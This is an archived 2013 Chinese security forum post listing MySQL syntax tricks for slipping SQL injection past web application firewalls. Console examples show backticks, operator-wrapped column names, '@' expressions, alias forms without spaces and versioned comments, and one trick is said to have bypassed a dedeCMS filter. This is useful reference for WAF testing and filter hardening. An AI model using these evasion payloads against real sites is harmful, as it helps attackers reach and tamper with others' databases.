# waf 绕过的技巧

Author: 乌云历史资料库 (@wooyun_archive)
Published: 2013-05-31T09:41:00Z
Canonical: https://wepostx.com/topics/422

> 乌云历史资料归档
>
> **原始作者：** livers
> **原始编号：** superkieran-wooyundrops:21
> **原始发布时间：** 2013-05-31 17:41
> **声明：内容仅用于技术研究和个人使用，版权归 wooyun.org。**

---

研究过国内外的waf。分享一些 奇淫绝技。
一些大家都了解的技巧如：/*!*/,SELECT[0x09,0x0A-0x0D,0x20,0xA0]xx FROM 不再重造轮子。
Mysql

## tips1: 神奇的 ` (格式输出表的那个控制符)
过空格和一些正则。

```text
mysql> select`version`() -> ; +----------------------+ | `version`() | +----------------------+ | 5.1.50-community-log | +----------------------+ 1 row in set (0.00 sec)
```
一个更好玩的技巧，这个`控制符可以当注释符用（限定条件）。

```text
mysql> select id from qs_admins where id=1;`dfff and comment it; +----+ | id | +----+ | 1 | +----+ 1 row in set (0.00 sec)
```
usage : where  id ='0'`'xxxxcomment on.

## tips2:神奇的- + .

```text
mysql> select id from qs_admins; +----+ | id | +----+ | 1 | +----+ 1 row in set (0.00 sec) mysql> select+id-1+1.from qs_admins; +----------+ | +id-1+1. | +----------+ | 1 | +----------+ 1 row in set (0.00 sec) mysql> select-id-1+3.from qs_admins; +----------+ | -id-1+3. | +----------+ | 1 | +----------+ 1 row in set (0.00 sec)
```
（有些人不是一直在说关键字怎么过？过滤一个from ...    就是这样连起来过）

## tips3: @

```text
mysql> select@^1.from qs_admins; +------|+ | @^1. | +------|+ | NULL | +------|+
```
这个是bypass  曾经dedeCMS filter .
或者这样也是ok.

## tips4：mysql function() as xxx 也可以不用as 和空格

```text
mysql> select-count(id)test from qs_admins; +------|+ | test | +------|+ | -1 | +------|+ 1 row in set (0.00 sec)
```

## tips5:/*![>5000]*/ 新构造 版本号（这个可能有些过时了。）

```text
mysql> /\*!40000select\*/ id from qs_admins; +----+ | id | +----+ | 1 | +----+ 1 row in set (0.00 sec)
```
先分享这么多，哈。

## Replies
